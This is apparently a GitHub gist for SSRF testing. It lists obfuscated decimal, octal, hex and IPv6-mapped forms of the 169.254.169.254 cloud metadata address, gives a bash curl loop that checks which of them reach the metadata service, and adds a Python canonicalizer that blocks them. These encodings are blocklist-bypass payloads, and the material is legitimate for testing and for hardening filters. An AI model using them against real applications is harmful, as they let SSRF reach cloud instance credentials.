Last active
September 15, 2022 18:29
Example of bypasses for naive blacklists of 169.254.169.254 local metadata service. Useful for SSRF testing, among other things. See https://twitter.com/coffeetocode/status/912788650408026112
$ ./try_local_metadata.sh
Trying 169.254.169.254... found metadata
Trying 169.254.43518... found metadata
Trying 169.16689662... found metadata
Trying 2852039166... found metadata
Trying 0251.0376.0251.0376... found metadata
Trying 0251.0376.0124776... found metadata
Trying 251.0775248... -
Trying 25177524776... -
Trying 0xa9.0xfe.0xa9.0xfe... found metadata
Trying 0xa9.0xfe.0xa9fe... found metadata
Trying 0xa9.0xfea9fe... found metadata
Trying 0xa9fea9fe... found metadata
Trying metadata.coffeetocode.net... found metadata
Trying 425.510.425.510... -
Trying 7147006462... -
Trying 0xA9.0xFE.0xA9.0xFE... found metadata
Trying 0xA9FEA9FE... found metadata
Trying 0x41414141A9FEA9FE... -
Trying 0251.0376.0251.0376... found metadata
Trying 0251.00376.000251.0000376... found metadata
Trying [::1698.254.169.254]... -
Trying instance-data... -
Trying metadata.google.internal... -
Trying metadata... -
Trying fd00:ec2::254... -
Trying [::ffff:a9fe:a9fe]... found metadata
Trying [::ffff:169.254.169.254]... found metadata
Trying [0:0:0:0:0:ffff:169.254.169.254]... found metadata
Trying ::ffff:a9fe:a9fe... -
Trying ::ffff:169.254.169.254... -
Trying 0:0:0:0:0:ffff:169.254.169.254... -

169.254.169.254
169.254.43518
169.16689662
2852039166
0251.0376.0251.0376
0251.0376.0124776
251.0775248
25177524776
0xa9.0xfe.0xa9.0xfe
0xa9.0xfe.0xa9fe
0xa9.0xfea9fe
0xa9fea9fe
metadata.coffeetocode.net
425.510.425.510
7147006462
0xA9.0xFE.0xA9.0xFE
0xA9FEA9FE
0x41414141A9FEA9FE
0251.0376.0251.0376
0251.00376.000251.0000376
[::1698.254.169.254]
instance-data
metadata.google.internal
metadata
fd00:ec2::254
[::ffff:a9fe:a9fe]
[::ffff:169.254.169.254]
[0:0:0:0:0:ffff:169.254.169.254]
::ffff:a9fe:a9fe
::ffff:169.254.169.254
0:0:0:0:0:ffff:169.254.169.254

#!/bin/bash
# run on an instance of course...
# add metadata flavor headers as necessary: https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb
# Reads one candidate host per line from local_metadata_synonyms.txt.
while IFS= read -r p; do
    printf "Trying %-30s " "$p..."
    # A response containing "latest" is treated as the metadata service answering.
    if curl -s "http://$p/" | grep --silent latest; then
        echo found metadata
    else
        echo -
    fi
done <local_metadata_synonyms.txt
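
A defender's counterpart to the list above, as an added example that is not part of the original gist: instead of matching the literal string 169.254.169.254, canonicalize the host first and compare addresses. The function names, the `resolve` DNS hook and the blocklist contents are assumptions made for illustration.

```python
import ipaddress
import re

# Constructed blocklist: IPv4 link-local (contains 169.254.169.254) plus the
# fd00:ec2::254 entry from the page's list.
BLOCKED = [ipaddress.ip_network("169.254.0.0/16"),
           ipaddress.ip_network("fd00:ec2::254/128")]
PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")

def parse_inet_aton(text):
    """Lenient inet_aton-style IPv4 parsing: 1-4 parts, each decimal, octal
    (leading 0) or hex (0x); the last part fills all remaining bytes."""
    parts = text.split(".")
    if len(parts) > 4 or not all(PART.fullmatch(p) for p in parts):
        return None
    nums = [int(p, 16) if p[:2].lower() == "0x" else
            int(p, 8) if p[0] == "0" else int(p) for p in parts]
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 256 ** (5 - len(nums)):
        return None                        # a part overflows its byte budget
    value = nums[-1]
    for i, n in enumerate(nums[:-1]):
        value |= n << (8 * (3 - i))        # leading parts are single bytes
    return ipaddress.IPv4Address(value)

def canonical_ips(host, resolve=lambda name: []):
    """Addresses a URL host can reach, canonicalized. `resolve` is a
    hypothetical DNS hook (name -> list of address strings)."""
    host = host.strip("[]")                # URL brackets around IPv6 literals
    ip = parse_inet_aton(host)
    if ip is None and ":" in host:
        try:
            ip = ipaddress.IPv6Address(host)
        except ValueError:
            return []                      # malformed literal, nothing to reach
        ip = ip.ipv4_mapped or ip          # unwrap ::ffff:a.b.c.d
    if ip is None:                         # a name: check what it resolves to
        return [a for addr in resolve(host) for a in canonical_ips(addr)]
    return [ip]

def is_blocked(host, resolve=lambda name: []):
    """True if any canonical address of `host` falls in a blocked network."""
    ips = canonical_ips(host, resolve)
    return any(ip in net for ip in ips for net in BLOCKED)

if __name__ == "__main__":
    for h in ["169.254.43518", "0xa9.0xfea9fe", "0251.0376.0124776",
              "[::ffff:a9fe:a9fe]", "425.510.425.510"]:   # taken from the list above
        print(f"{h:22} blocked={is_blocked(h)}")
```

Names such as metadata.coffeetocode.net are only caught once `resolve` is wired to real DNS, and the request should then connect to the address that was checked rather than resolving the name a second time.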
Added some IPv6 synonyms and google-specific hostnames
Fixed missing digit in 169.16689662 and confirmed that works as expected now.